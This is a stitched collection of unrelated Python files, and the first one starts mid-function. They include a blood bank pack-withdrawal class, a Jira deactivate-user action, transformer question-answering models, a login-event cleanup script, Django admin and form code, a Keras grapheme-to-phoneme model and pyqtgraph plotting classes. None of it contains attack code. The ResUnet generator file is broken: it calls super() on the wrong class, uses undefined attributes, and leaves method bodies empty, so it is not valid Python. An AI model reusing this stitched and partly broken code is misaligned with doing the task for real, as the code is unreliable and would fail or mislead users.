bTypes = [x for x in self.bloodTypeDistribution.keys()]
bCounts = [x for x in data["frozen"].values()]
distributions = [x for x in self.bloodTypeDistribution.values()]
suitability.append((
bTypes[i],
distributions[i] * bCounts[i]
))
suitability = sorted(suitability, key=lambda x:x[1], reverse=True)
return suitability
def getMostSuitableDonorsFromCooled(self):
suitability = []
with open("api/data/counts.json", "r") as counts:
data = json.load(counts)
for i in range(8):
bTypes = [x for x in self.bloodTypeDistribution.keys()]
bCounts = [x for x in data["cooled"].values()]
distributions = [x for x in self.bloodTypeDistribution.values()]
suitability.append((
bTypes[i],
distributions[i] * bCounts[i]
))
suitability = sorted(suitability, key=lambda x:x[1], reverse=True)
return suitability
def addNewPortion(self, bloodType):
with open("api/data/counts.json", "r") as counts:
cnts = json.load(counts)
with open("api/data/cooledPacks.json", "r") as cooled:
cld = json.load(cooled)
cnts["cooled"][bloodType] += 1
cld[self.findLastCooledID(cld)] = {
"type": bloodType,
"added_on": datetime.today().date().strftime("%d-%m-%Y")
}
with open("api/data/counts.json", "w") as packs:
json.dump(cnts, packs)
with open("api/data/cooledPacks.json", "w") as packs:
json.dump(cld, packs)
return (bloodType, cnts["cooled"][bloodType])
def withdrawPortion(self, bloodType, urgency):
with open("api/data/counts.json", "r") as counts:
cnts = json.load(counts)
if urgency == "reg":
#first check frozen
sortedList = self.getMostSuitableDonorsFromFrozen()
donorsList = self.possibleDonors[bloodType]
sortedDonors = []
for i in sortedList:
if i[0] in donorsList:
sortedDonors.append(i)
sortedDonors.sort(key=lambda tup: tup[1], reverse=True)
chosenBloodType = sortedDonors[0][0]
print(" RESULTS OF PULLING REGULAR:")
print(sortedList)
print(sortedDonors)
print(chosenBloodType)
if cnts["frozen"][chosenBloodType] > 0:
#Remove first found pack of this blood type
with open("api/data/frozenPacks.json", "r") as cooled:
frz = json.load(cooled)
for k,v in frz.items():
if v["type"] == chosenBloodType:
del frz[k]
break
with open("api/data/frozenPacks.json", "w") as packs:
json.dump(frz, packs)
#Update pack count
cnts["frozen"][chosenBloodType] -= 1
with open("api/data/counts.json", "w") as packs:
json.dump(cnts, packs)
return (chosenBloodType, cnts["frozen"][chosenBloodType])
else:
#If not found, check cooled
sortedList = self.getMostSuitableDonorsFromCooled()
donorsList = self.possibleDonors[bloodType]
sortedDonors = []
for i in sortedList:
if i[0] in donorsList:
sortedDonors.append(i)
sortedDonors.sort(key=lambda tup: tup[1], reverse=True)
chosenBloodType = sortedDonors[0][0]
if cnts["cooled"][chosenBloodType] > 0:
#Remove first found pack of this blood type
with open("api/data/cooledPacks.json", "r") as cooled:
cld = json.load(cooled)
for k,v in cld.items():
if v["type"] == chosenBloodType:
del cld[k]
break
with open("api/data/cooledPacks.json", "w") as packs:
json.dump(cld, packs)
#Update pack count
cnts["cooled"][chosenBloodType] -= 1
with open("api/data/counts.json", "w") as packs:
json.dump(cnts, packs)
return (chosenBloodType, cnts["cooled"][chosenBloodType])
else:
#If not found, return a message on failed search
return ("None", 0)
else:
#first check cooled
sortedList = self.getMostSuitableDonorsFromCooled()
donorsList = self.possibleDonors[bloodType]
sortedDonors = []
for i in sortedList:
if i[0] in donorsList:
sortedDonors.append(i)
sortedDonors.sort(key=lambda tup: tup[1], reverse=True)
chosenBloodType = sortedDonors[0][0]
if cnts["cooled"][chosenBloodType] > 0:
#Remove first found pack of this blood type
with open("api/data/cooledPacks.json", "r") as cooled:
cld = json.load(cooled)
for k,v in cld.items():
if v["type"] == chosenBloodType:
del cld[k]
break
with open("api/data/cooledPacks.json", "w") as packs:
json.dump(cld, packs)
#Update pack count
cnts["cooled"][chosenBloodType] -= 1
with open("api/data/counts.json", "w") as packs:
json.dump(cnts, packs)
return (chosenBloodType, cnts["cooled"][chosenBloodType])
else:
#If not found, check frozen
sortedList = self.getMostSuitableDonorsFromFrozen()
donorsList = self.possibleDonors[bloodType]
sortedDonors = []
for i in sortedList:
if i[0] in donorsList:
sortedDonors.append(i)
sortedDonors.sort(key=lambda tup: tup[1], reverse=True)
chosenBloodType = sortedDonors[0][0]
if cnts["frozen"][chosenBloodType] > 0:
#Remove first found pack of this blood type
with open("api/data/frozenPacks.json", "r") as cooled:
frz = json.load(cooled)
for k,v in frz.items():
if v["type"] == chosenBloodType:
del frz[k]
break
with open("api/data/frozenPacks.json", "w") as packs:
json.dump(frz, packs)
#Update pack count
cnts["frozen"][chosenBloodType] -= 1
with open("api/data/counts.json", "w") as packs:
json.dump(cnts, packs)
return (chosenBloodType, cnts["frozen"][chosenBloodType])
else:
#If not found, return a message on failed search
return ("None", 0)
def massWithdrawal(self, amounts):
taken = {
'A+': 0,
'O+': 0,
'B+': 0,
'AB+': 0,
'A-': 0,
'O-': 0,
'B-': 0,
'AB-': 0
}
unpulled = {
'A+': amounts[0][1],
'O+': amounts[1][1],
'B+': amounts[2][1],
'AB+': amounts[3][1],
'A-': amounts[4][1],
'O-': amounts[5][1],
'B-': amounts[6][1],
'AB-': amounts[7][1]
}
partial = "False"
for req in amounts:
for i in range(req[1]):
withdrawn = (self.withdrawPortion(req[0], "emg"))[0]
if withdrawn != "None":
taken[withdrawn] += 1
unpulled[req[0]] -= 1
for v in unpulled.values():
if v > 0:
partial = "True"
return (taken, unpulled, partial)
def getPackCounts(self):
cooled = []
frozen = []
with open("api/data/counts.json", "r") as counts:
cnts = json.load(counts)
for x in cnts["cooled"].values():
cooled.append(x)
for x in cnts["frozen"].values():
frozen.append(x)
res = [cooled, frozen]
return res |
from base import JiraBaseAction
class JiraDeactivateUser(JiraBaseAction):
def _run(self, username):
return self.jira.deactivate_user(username)
|
from dateutil import parser
class Condition(object):
"""
The current weather conditions.
Attributes:
code: The condition code for the forecast. The possible values for the
code are described at the following URL (integer).
http://developer.yahoo.com/weather/#codes
If no code is found code will be None.
date: The date and time the forecast was posted, time-zone unaware
(datetime).
temperature: The current temperature in the units specified in the
temperature variable of the Units class (integer). If no value for the
temperature is found, temperature will be None.
text: A textual description of the conditions. E.g. Partly Cloudy
(string).
"""
def __init__(self, condition):
try:
self.temperature = int(condition['temp'])
except ValueError:
self.temperature = None
self.date = parser.parse(condition['date'], ignoretz=True)
self.text = condition['text']
try:
self.code = int(condition['code'])
except ValueError:
self.code = None
|
import config
import transformers
import torch.nn as nn
import config_file
from transformers import (BertConfig, BertForQuestionAnswering, BertTokenizer,XLNetConfig, XLNetForQuestionAnsweringSimple,
XLNetTokenizer,XLMConfig, XLMForQuestionAnswering, XLMTokenizer,
RobertaConfig, RobertaForQuestionAnswering, RobertaTokenizer)
from transformers import RobertaModel
MODEL_CLASSES = {
'bert': (BertConfig, BertForQuestionAnswering, BertTokenizer,config_file.BERT_PATH),
'xlnet': (XLNetConfig, XLNetForQuestionAnsweringSimple, XLNetTokenizer,config_file.XLNET_PATH),
'xlm': (XLMConfig, XLMForQuestionAnswering, XLMTokenizer,config_file.XLM_PATH),
'roberta': (RobertaConfig, RobertaForQuestionAnswering, RobertaTokenizer,config_file.ROBERTA_PATH),
'distil-roberta': (RobertaConfig, RobertaForQuestionAnswering, RobertaTokenizer,config_file.DISTIL_ROBERTA_PATH),
'roberta-finetuned':(RobertaConfig, RobertaForQuestionAnswering, RobertaTokenizer,config_file.FINETUNED_ROBERTA,config_file.ROBERTA_PATH),
'bert-finetuned':(BertConfig, BertForQuestionAnswering, BertTokenizer,config_file.FINETUNED_BERT,config_file.BERT_PATH)
}
class BERTBaseUncased(nn.Module):
def __init__(self):
super(BERTBaseUncased, self).__init__()
self.bert = transformers.RobertaModel.from_pretrained(config.BERT_PATH)
self.bert_drop = nn.Dropout(0.3)
self.out = nn.Linear(1024, 3)
def forward(self, ids, mask):
_, o2 = self.bert(ids, attention_mask=mask)
print(self.bert.layers)
bo = self.bert_drop(o2)
output = self.out(bo)
return output
class NER_Head(nn.Module):
def __init__(self,hidden_size,max_len):
super(NER_Head, self).__init__()
self.hidden_size=hidden_size
self.max_len=max_len
self.ner_loss=nn.CrossEntropyLoss()
self.out = nn.Linear(hidden_size*max_len, 19)
def forward(self, hid_states,ner_label):
output=self.out(hid_states.reshape(-1,self.hidden_size*self.max_len))
ner_loss=self.ner_loss(output,ner_label)
return ner_loss
class Generator(nn.Module):
def __init__(self,args):
super(Generator,self).__init__()
self.config_class, self.model_class, self.tokenizer_class,self.path_class = MODEL_CLASSES[args.model_type]
self.model=self.model_class.from_pretrained(self.path_class)
self.dis=nn.Linear(1024,1)
self.dis_loss_fn=nn.BCEWithLogitsLoss()
def forward(self,input_ids=None,attention_mask=None,start_positions=None,end_positions=None,is_pseudo=None):
output=self.model(input_ids=input_ids,attention_mask=attention_mask,start_positions=start_positions,end_positions=end_positions,output_hidden_states=True)
loss=None
start_logits=None
end_logits=None
if start_positions!=None:
loss=output['loss']
#hiddden state of encoder
hid_states=output['hidden_states']
# print('hidden_state_shape',hid_states[1][:,0,:].shape)
dis_out=self.dis(hid_states[1][:,0,:])
dis_loss=self.dis_loss_fn(dis_out.squeeze(),is_pseudo.type_as(dis_out))
loss+=dis_loss
else:
# print('hidden_state_shape',dis_out.shape)
# print('loss ,dis_loss',loss,dis_loss)
start_logits=output['start_logits']
end_logits=output['end_logits']
return loss,start_logits,end_logits
class Discriminator(nn.Module):
def __init__(self,args):
super(Discriminator,self).__init__()
self.model=RobertaModel.from_pretrained(args.discriminator_path)
self.linear=nn.Linear(1024,1)
def forward(self,token_ids,token_mask):
out=self.model(token_ids,token_mask)
out=out['pooler_output']
# print(out.shape,out[0])
out=nn.Sigmoid()(self.linear(out))
return out
class Generate(nn.Module):
def __init__(self,args):
super(Generate,self).__init__()
self.config_class, self.model_class, self.tokenizer_class,self.path_class = MODEL_CLASSES[args.model_type]
self.model=self.model_class.from_pretrained(self.path_class)
def forward(self,input_ids=None,attention_mask=None,start_positions=None,end_positions=None,is_pseudo=None):
# output=self.model(input_ids=input_ids,attention_mask=attention_mask,start_positions=start_positions,end_positions=end_positions)
# start_logits=output['start_logits']
# end_logits=output['end_logits']
# return start_logits,end_logits
# self.model.train()
output=self.model(input_ids=input_ids,attention_mask=attention_mask,start_positions=start_positions,end_positions=end_positions)
# print('inside generator',list(self.model.parameters())[0].grad)
loss=None
start_logits=None
end_logits=None
if start_positions!=None:
loss=output['loss']
#hiddden state of encoder
# hid_states=output['hidden_states']
# print('hidden_state_shape',hid_states[1][:,0,:].shape)
# dis_out=self.dis(hid_states[1][:,0,:])
# dis_loss=self.dis_loss_fn(dis_out.squeeze(),is_pseudo.type_as(dis_out))
# loss+=dis_loss
# else:
# print('hidden_state_shape',dis_out.shape)
# print('loss ,dis_loss',loss,dis_loss)
start_logits=output['start_logits']
end_logits=output['end_logits']
return loss,start_logits,end_logits
|
#!/usr/bin/env python
"""Delete login user events older than a given number of days.
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from datetime import datetime, timedelta
import click
from byceps.database import db
from byceps.services.user.models.event import UserEvent as DbUserEvent
from byceps.util.system import get_config_filename_from_env_or_exit
from _util import app_context
@click.command()
@click.option(
'--dry-run', is_flag=True, help='count but do not delete affected records',
)
@click.argument('minimum_age_in_days', type=int)
def execute(dry_run, minimum_age_in_days):
latest_occurred_at = get_latest_occurred_at(minimum_age_in_days)
click.secho(
f'Deleting all user login events older than {minimum_age_in_days} days '
f'(i.e. before {latest_occurred_at:%Y-%m-%d %H:%M:%S}) ...'
)
num_deleted = delete_user_login_events_before(latest_occurred_at, dry_run)
click.secho(f'{num_deleted} user login events deleted.')
if dry_run:
click.secho(
f'This was a dry run; no records have been deleted.', fg='yellow'
)
def get_latest_occurred_at(minimum_age_in_days: int) -> datetime:
now = datetime.utcnow()
return now - timedelta(days=minimum_age_in_days)
def delete_user_login_events_before(
latest_occurred_at: datetime, dry_run: bool
) -> int:
num_deleted = DbUserEvent.query \
.filter_by(event_type='user-logged-in') \
.filter(DbUserEvent.occurred_at <= latest_occurred_at) \
.delete()
if not dry_run:
db.session.commit()
return num_deleted
if __name__ == '__main__':
config_filename = get_config_filename_from_env_or_exit()
with app_context(config_filename):
execute()
|
from django.contrib import admin, messages
from django.db import IntegrityError
from requests import HTTPError
from .api import (
make_import_language_list,
)
from .models import (
ListLanguagesModel,
TranslatedTextModel,
)
class LanguageListAdmin(admin.ModelAdmin):
list_display = [
'code',
'name',
]
actions = [
'make_import',
]
def make_import(self, request, queryset):
try:
make_import_language_list()
except IntegrityError:
messages.error(
request,
'Произошла ошибка при запись в БД',
)
except HTTPError as ex:
messages.error(
request,
str(ex),
)
make_import.short_description = 'Выполнить импорт списка доступных языков'
# Импорт выполняется при вызове шаблона добавления новой записи
def add_view(self, request, form_url='', extra_context=None):
self.make_import(
request=request,
queryset=None,
)
messages.info(
request,
'Импорт записей был успешно выполнен'
)
# Показываем списочный шаблон вместо показа формы добавления
return super().changelist_view(
request=request,
extra_context=extra_context,
)
class TranslateTextAdmin(admin.ModelAdmin):
list_display = [
'input_text',
'language',
'output_text',
]
# Выполнить перевод из списочного вида
actions = [
'translate_text_in_queryset',
]
def translate_text_in_queryset(self, request, queryset):
queryset = queryset.select_related(
'language',
)
try:
for obj in queryset:
obj.translate_text_with_html()
except HTTPError as ex:
messages.error(
request,
str(ex),
)
translate_text_in_queryset.short_description = 'Выполнить перевод'
# Перевод выполняется при сохранении записи модели
def response_post_save_change(self, request, obj):
try:
obj.translate_text_with_html()
except HTTPError as ex:
messages.error(
request,
str(ex),
)
return super().response_post_save_change(request, obj)
admin.site.register(ListLanguagesModel, LanguageListAdmin)
admin.site.register(TranslatedTextModel, TranslateTextAdmin)
|
from tensorflow.keras.layers import *
from tensorflow.keras.models import Model
import os
import numpy as np
import tensorflow.keras.backend as K
import unicodedata
#text = [l.strip().split('\t') for l in open('corrected_forms.tsv','r') for i in range(10)]+[l.strip().split('\t') for l in open('training_data.tsv','r')]
fixed = [l.strip().split('\t') for l in open('corrected_forms.tsv','r')]
nonfixed = [l.strip().split('\t') for l in open('training_data.tsv','r')]
corr_dict = {(l[0],l[1]):l[2] for l in fixed}
ipa_dict = {(l[0],l[1]):l[2] for l in nonfixed}
cutoff = len(fixed)
text = fixed+nonfixed
text = [l for l in text if len(l[2]) < 30]
lang_raw = [l[0] for l in text]
input_raw = [list(l[-2].replace('.','').replace('(','').replace(')','').lower()) for l in text]
output_raw = [['[']+list(l[-1].replace('.','').replace('(','').replace(')','').lower())[1:-1]+[']'] for l in text]
langs = sorted(set(lang_raw))
input_segs = sorted(set([s for w in input_raw for s in w]))
output_segs = sorted(set([s for w in output_raw for s in w]))
N = len(text)
L = len(langs)
X = len(input_segs)
Y = len(output_segs)
T_x = max([len(l) for l in input_raw])
T_y = max([len(l) for l in output_raw])
lang_id = np.zeros([N,T_x,L],dtype=np.float32)
encoder_input = np.zeros([N,T_x,X],dtype=np.float32)
decoder_input = np.zeros([N,T_y,Y],dtype=np.float32)
decoder_output = np.zeros([N,T_y,Y],dtype=np.float32)
for i in range(N):
for j,s in enumerate(input_raw[i]):
encoder_input[i,j,input_segs.index(s)] = 1.
lang_id[i,j,langs.index(lang_raw[i])] = 1.
for j,s in enumerate(output_raw[i]):
decoder_input[i,j,output_segs.index(s)] = 1.
if j > 0:
decoder_output[i,j-1,output_segs.index(s)] = 1.
lang_id_ = Input((T_x,L))
encoder_input_ = Input((T_x,X))
decoder_input_ = Input((T_y,Y))
def nonmonotonic_alignment(args):
h_enc,h_dec,max_encoder_seq_length,latent_dim = args
alignment_probs = K.softmax(dot([Dense(latent_dim)(h_enc),h_dec],axes=-1,normalize=False),-2)
return(alignment_probs)
def gen_output(args):
alignment_probs,emission_probs = args
return(K.sum(K.expand_dims(alignment_probs,-1)*emission_probs,-3))
def gen_emission_probs(args):
h_enc,h_dec,max_encoder_seq_length,max_decoder_seq_length,num_decoder_tokens,hidden_dim = args
h_enc_rep = K.tile(K.expand_dims(h_enc,-2),[1,1,max_decoder_seq_length,1])
h_dec_rep = K.tile(K.expand_dims(h_dec,-3),[1,max_encoder_seq_length,1,1])
h_rep = K.concatenate([h_enc_rep,h_dec_rep],-1)
#emission probabilities
emission_probs = Dense(num_decoder_tokens, activation='softmax')(Dense(hidden_dim*3,activation='tanh')(h_rep))
return(emission_probs)
lang_embed = Dense(64)(lang_id_)
input_embed = Dense(64)(encoder_input_)
input_ = concatenate([lang_embed,input_embed])
h_dec = LSTM(64, return_sequences=True)(decoder_input_)
h_enc = Bidirectional(LSTM(64,return_sequences=True))(encoder_input_)
alignment_probs = Lambda(nonmonotonic_alignment)([h_enc,h_dec,T_x,64])
alignment_probs = Lambda(lambda x:x, name='attention')(alignment_probs)
emission_probs = gen_emission_probs([h_enc,h_dec,T_x,T_y,Y,64])
decoder_output_ = Lambda(gen_output)([alignment_probs,emission_probs])
model = Model([lang_id_, encoder_input_, decoder_input_], decoder_output_)
model.compile(optimizer='adam', loss='categorical_crossentropy',metrics=['accuracy'])
#model.save_weights('g2p.h5')
model.load_weights('g2p.h5')
for i in range(10):
#indices = np.arange(len(text))
# indices = np.concatenate([np.arange(cutoff),np.random.randint(cutoff,len(text),cutoff*10)])
# model.fit([lang_id[indices], encoder_input[indices], decoder_input[indices]], decoder_output[indices], epochs=1)
model.fit([lang_id[:cutoff], encoder_input[:cutoff], decoder_input[:cutoff]], decoder_output[:cutoff], batch_size=32, epochs=1)
model.save('g2p.h5')
def decode_sequence(input_seq,lang_id,attn=False):
input_seq = list(input_seq)
# string = ['\t']
lang_id_ = np.zeros([1,T_x,L])
input_seq_ = np.zeros([1,T_x,X])
for i,s in enumerate(input_seq):
if s in input_segs:
input_seq_[0,i,input_segs.index(s)] = 1.
lang_id_[0,i,langs.index(lang_id)] = 1.
lang_id = lang_id_
input_seq = input_seq_
string = []
target_seq = np.zeros((1, T_y, Y))
target_seq[0, 0, output_segs.index('[')] = 1.
# attention_mat
for t in range(T_y-1):
output_tokens = model.predict([lang_id,input_seq,target_seq])
curr_index = np.argmax(output_tokens[:,t,:])
target_seq[0, t+1, curr_index] = 1.
symbol = output_segs[curr_index]
string.append(symbol)
if symbol == ']':
break
return(string)
old_IPA = [l.strip().split('\t') for l in open('old_IPA.tsv','r')]
old_IPA_key = {(l[1],l[2]):l[3] for l in old_IPA}
ocskey = """i;i
y;ɨ
u;u
ь;ɪ
ъ;ʊ
e;ɛ
o;ɔ
ę;ɛ̃
ę;ɛ̃
ǫ;ɔ̃
ǫ;ɔ̃
ě;æ
ě;æ
p;p
b;b
m;m
w;w
t;t
d;d
s;s
z;z
c;t͡s
ʒ;dz
n;n
l;l
r;r
č;t͡ʃ
š;ʃ
ž;ʒ
j;j
lʹ;ʎ
nʹ;ɲ
rʹ;rʲ
lj;ʎ
nj;ɲ
rj;rʲ
k;k
g;g
x;x"""
ocskey = ocskey.split('\n')
ocskey = [l.split(';') for l in ocskey]
ocskey = sorted(ocskey,key=lambda x:len(x[0]),reverse=True)
forms = [l.strip().split('\t') for l in open('../derksen_slavic_fixed.tsv','r')]
for i,l in enumerate(forms):
#if l[3] == 'russian':
forms[i][4] = bytes(l[4],'utf8').decode('utf8').replace("'","ʹ").replace('ë','jó').replace('ĺ','lʹ')
for l in forms:
etym = l[0]
lang = l[3]
orth = unicodedata.normalize('NFC',l[4]).lower()
if lang != 'church_slavic' and lang != 'old_church_slavic':
if (lang,orth) in corr_dict.keys():
print(lang,orth,corr_dict[(lang,orth)],'C')
elif (lang,orth) in ipa_dict.keys():
print(lang,orth,ipa_dict[(lang,orth)],'I')
else:
if (lang,orth) in old_IPA_key.keys():
print(lang,orth,''.join(decode_sequence(orth,lang)[:-1]),old_IPA_key[(lang,orth)])
else:
print(lang,orth,''.join(decode_sequence(orth,lang)[:-1]))
else:
phon = orth
for k in ocskey:
phon = phon.replace(k[0],k[1])
print(lang,orth,phon)
|
from django import forms
from .models import Comments
class CommentsForm(forms.ModelForm):
class Meta:
model = Comments
exclude = ['is_delete', 'create_time', 'update_time']
error_messages = {
'author': {
'max_length': '亲, 名字长度不能超过10位数哦',
'required': '亲, 名字不能为空哦',
},
'content': {
'required': '亲, 内容不能为空哦'
},
'mail': {
'required': '亲, 邮箱不能为空哦'
}
} |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 12 14:43:23 2017
@author: jjcao
"""
import torch
import torch.nn as nn
import functools
#
class ResUnetGenerator(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, ngf=64,
norm_layer=nn.BatchNorm2d, use_dropout=False, gpu_ids=[]):
super(UnetBGenerator, self).__init__()
self.gpu_ids = gpu_ids
# construct unet structure
planes = [ngf, ngf*2, ngf*4, ngf*8]
self.down = [UnetDown(input_nc, output_nc=planes[0], norm_layer=norm_layer)]
self.down += [UnetDown(planes[0], output_nc=planes[1], norm_layer=norm_layer)]
self.down += [UnetDown(planes[1], output_nc=planes[2], norm_layer=norm_layer)]
self.down += [UnetDown(planes[2], output_nc=planes[3], norm_layer=norm_layer)]
for i in range(num_downs - 5):
self.down += [UnetDown(planes[3], output_nc=planes[3], norm_layer=norm_layer, use_dropout=use_dropout)]
self.center = [UnetCenter(planes[3], output_nc=planes[3])]
self.up = []
for i in range(num_downs - 5):
self.up += [UnetUp(planes[3], output_nc=planes[3], norm_layer=norm_layer, use_dropout=use_dropout)]
self.up += [UnetUp(planes[3], output_nc=planes[2], norm_layer=norm_layer)]
self.up += [UnetUp(planes[2], output_nc=planes[1], norm_layer=norm_layer)]
self.up += [UnetUp(planes[1], output_nc=planes[0], norm_layer=norm_layer)]
self.up += [UnetUp(planes[0], output_nc=output_nc, norm_layer=norm_layer, outermost=True)]
self.down = nn.Sequential(*self.down)
# self.model = self.down + self.center + self.up
# self.model = nn.Sequential(*model)
def forward(self, input):
x = self.netFeat.forward(input)
if self.gpu_ids and isinstance(input.data, torch.cuda.FloatTensor):
p1 = nn.parallel.data_parallel(self.pool1, x, self.gpu_ids)
p2 = nn.parallel.data_parallel(self.pool2, x, self.gpu_ids)
p4 = nn.parallel.data_parallel(self.pool4, x, self.gpu_ids)
p8 = nn.parallel.data_parallel(self.pool8, x, self.gpu_ids)
out = torch.cat([x,p1, p2, p4, p8], 1)
return nn.parallel.data_parallel(self.final, out, self.gpu_ids)
else:
p1 = self.pool1(x)
p2 = self.pool2(x)
p4 = self.pool4(x)
p8 = self.pool8(x)
out = torch.cat([x,p1, p2, p4, p8], 1)
return self.final(out)
class UnetCenter(nn.Module):
def __init__(self, in_size, out_size, is_batchnorm):
super(UnetCenter, self).__init__()
def forward(self, inputs):
class UnetDown(nn.Module):
def __init__(self, in_size, out_size, is_batchnorm):
super(UnetDown, self).__init__()
def forward(self, inputs):
class UnetUp(nn.Module):
def __init__(self, in_size, out_size, is_deconv):
super(UnetUp, self).__init__()
def forward(self, inputs1, inputs2):
|
import logging
log = logging.getLogger(__name__)
import itertools
import importlib
from functools import partial
from collections import defaultdict
import numpy as np
import pandas as pd
import pyqtgraph as pg
from atom.api import (Unicode, Float, Tuple, Int, Typed, Property, Atom, Bool,
Enum, List, Dict, Callable, Value)
from enaml.application import deferred_call, timed_call
from enaml.colors import parse_color
from enaml.core.api import Looper, Declarative, d_, d_func
from enaml.qt.QtGui import QColor
from psi.util import SignalBuffer, ConfigurationException
from psi.core.enaml.api import load_manifests, PSIContribution
from psi.controller.calibration import util
from psi.context.context_item import ContextMeta
################################################################################
# Utility functions
################################################################################
def get_x_fft(fs, duration):
n_time = int(fs * duration)
freq = np.fft.rfftfreq(n_time, fs**-1)
return np.log10(freq)
def get_color_cycle(name):
module_name, cmap_name = name.rsplit('.', 1)
module = importlib.import_module(module_name)
cmap = getattr(module, cmap_name)
return itertools.cycle(cmap.colors)
def make_color(color):
if isinstance(color, tuple):
return QColor(*color)
elif isinstance(color, str):
return QColor(color)
else:
raise ValueError('Unknown color %r', color)
################################################################################
# Style mixins
################################################################################
class ColorCycleMixin(Declarative):
#: Define the pen color cycle. Can be a list of colors or a string
#: indicating the color palette to use in palettable.
pen_color_cycle = d_(Typed(object))
_plot_colors = Typed(dict)
def _make_plot_cycle(self):
if isinstance(self.pen_color_cycle, str):
cycle = get_color_cycle(self.pen_color_cycle)
else:
cycle = itertools.cycle(self.pen_color_cycle)
return defaultdict(lambda: next(cycle))
@d_func
def get_pen_color(self, key):
if self._plot_colors is None:
self._plot_colors = self._make_plot_cycle()
color = self._plot_colors[key]
if not isinstance(color, str):
return QColor(*color)
else:
return QColor(color)
def _observe_pen_color_cycle(self, event):
self._plot_colors = self._make_plot_cycle()
self.reset_plots()
def reset_plots(self):
raise NotImplementedError
################################################################################
# Supporting classes
################################################################################
class BaseDataRange(Atom):
container = Typed(object)
# Size of display window
span = Float(1)
# Delay before clearing window once data has "scrolled off" the window.
delay = Float(0)
# Current visible data range
current_range = Tuple(Float(), Float())
def add_source(self, source):
cb = partial(self.source_added, source=source)
source.add_callback(cb)
def _default_current_range(self):
return 0, self.span
def _observe_delay(self, event):
self._update_range()
def _observe_span(self, event):
self._update_range()
def _update_range(self):
raise NotImplementedError
class EpochDataRange(BaseDataRange):
max_duration = Float()
def source_added(self, data, source):
n = [len(d['signal']) for d in data]
max_duration = max(n) / source.fs
self.max_duration = max(max_duration, self.max_duration)
def _observe_max_duration(self, event):
self._update_range()
def _update_range(self):
self.current_range = 0, self.max_duration
class ChannelDataRange(BaseDataRange):
# Automatically updated. Indicates last "seen" time based on all data
# sources reporting to this range.
current_time = Float(0)
current_samples = Typed(defaultdict, (int,))
current_times = Typed(defaultdict, (float,))
def _observe_current_time(self, event):
self._update_range()
def _update_range(self):
low_value = (self.current_time//self.span)*self.span - self.delay
high_value = low_value+self.span
self.current_range = low_value, high_value
def add_event_source(self, source):
cb = partial(self.event_source_added, source=source)
source.add_callback(cb)
def source_added(self, data, source):
self.current_samples[source] += data.shape[-1]
self.current_times[source] = self.current_samples[source]/source.fs
self.current_time = max(self.current_times.values())
def event_source_added(self, data, source):
self.current_times[source] = data[-1][1]
self.current_time = max(self.current_times.values())
def create_container(children, x_axis=None):
container = pg.GraphicsLayout()
container.setSpacing(10)
# Add the x and y axes to the layout, along with the viewbox.
for i, child in enumerate(children):
container.addItem(child.y_axis, i, 0)
container.addItem(child.viewbox, i, 1)
if x_axis is not None:
container.addItem(x_axis, i+1, 1)
# Link the child viewboxes together
for child in children[1:]:
child.viewbox.setXLink(children[0].viewbox)
#children[0].viewbox.setXRange(0, 100, padding=0)
return container
################################################################################
# Pattern containers
################################################################################
class MultiPlotContainer(Looper, PSIContribution):
group = d_(Unicode())
containers = d_(Dict())
_workbench = Value()
selected_item = Value()
def refresh_items(self):
super().refresh_items()
if not self.iterable:
return
self.containers = {str(i): c[0].container for \
i, c in zip(self.iterable, self.items)}
load_manifests(self.items, self._workbench)
for item in self.items:
load_manifests(item, self._workbench)
load_manifests(item[0].children, self._workbench)
deferred_call(item[0].format_container)
################################################################################
# Containers (defines a shared set of containers across axes)
################################################################################
class BasePlotContainer(PSIContribution):
label = d_(Unicode())
container = Typed(pg.GraphicsWidget)
x_axis = Typed(pg.AxisItem)
base_viewbox = Property()
legend = Typed(pg.LegendItem)
def _default_container(self):
return create_container(self.children, self.x_axis)
def _default_legend(self):
legend = pg.LegendItem()
legend.setParentItem(self.container)
return legend
def _get_base_viewbox(self):
return self.children[0].viewbox
def _default_x_axis(self):
x_axis = pg.AxisItem('bottom')
x_axis.setGrid(64)
x_axis.linkToView(self.children[0].viewbox)
return x_axis
def update(self, event=None):
pass
def find(self, name):
for child in self.children:
if child.name == name:
return child
def format_container(self):
pass
def _reset_plots(self):
pass
class PlotContainer(BasePlotContainer):
x_min = d_(Float(0))
x_max = d_(Float(0))
def format_container(self):
# If we want to specify values relative to a psi context variable, we
# cannot do it when initializing the plots.
if (self.x_min != 0) or (self.x_max != 0):
self.base_viewbox.setXRange(self.x_min, self.x_max, padding=0)
def update(self, event=None):
deferred_call(self.format_container)
class BaseTimeContainer(BasePlotContainer):
'''
Contains one or more viewboxes that share the same time-based X-axis
'''
data_range = Typed(BaseDataRange)
span = d_(Float(1))
delay = d_(Float(0.25))
def _default_container(self):
container = super()._default_container()
# Ensure that the x axis shows the planned range
self.base_viewbox.setXRange(0, self.span, padding=0)
self.data_range.observe('current_range', self.update)
return container
def _default_x_axis(self):
x_axis = super()._default_x_axis()
x_axis.setLabel('Time', unitPrefix='sec.')
return x_axis
def update(self, event=None):
low, high = self.data_range.current_range
deferred_call(self.base_viewbox.setXRange, low, high, padding=0)
super().update()
class TimeContainer(BaseTimeContainer):
def _default_data_range(self):
return ChannelDataRange(container=self, span=self.span,
delay=self.delay)
def update(self, event=None):
for child in self.children:
child.update()
super().update()
class EpochTimeContainer(BaseTimeContainer):
def _default_data_range(self):
return EpochDataRange(container=self, span=self.span, delay=self.delay)
def format_log_ticks(values, scale, spacing):
values = 10**np.array(values).astype(np.float)
return ['{:.1f}'.format(v) for v in values]
class FFTContainer(BasePlotContainer):
'''
Contains one or more viewboxes that share the same frequency-based X-axis
'''
freq_lb = d_(Float(5))
freq_ub = d_(Float(50000))
def _default_container(self):
container = super()._default_container()
self.base_viewbox.setXRange(np.log10(self.freq_lb),
np.log10(self.freq_ub),
padding=0)
return container
def _default_x_axis(self):
x_axis = super()._default_x_axis()
x_axis.setLabel('Frequency (Hz)')
x_axis.logTickStrings = format_log_ticks
x_axis.setLogMode(True)
return x_axis
################################################################################
# ViewBox
################################################################################
class ViewBox(PSIContribution):
viewbox = Typed(pg.ViewBox)
y_axis = Typed(pg.AxisItem)
y_mode = d_(Enum('symmetric', 'upper'))
y_min = d_(Float(0))
y_max = d_(Float(0))
allow_zoom_y = d_(Bool(True))
allow_zoom_x = d_(Bool(False))
data_range = Property()
def _default_name(self):
return self.label
def _get_data_range(self):
return self.parent.data_range
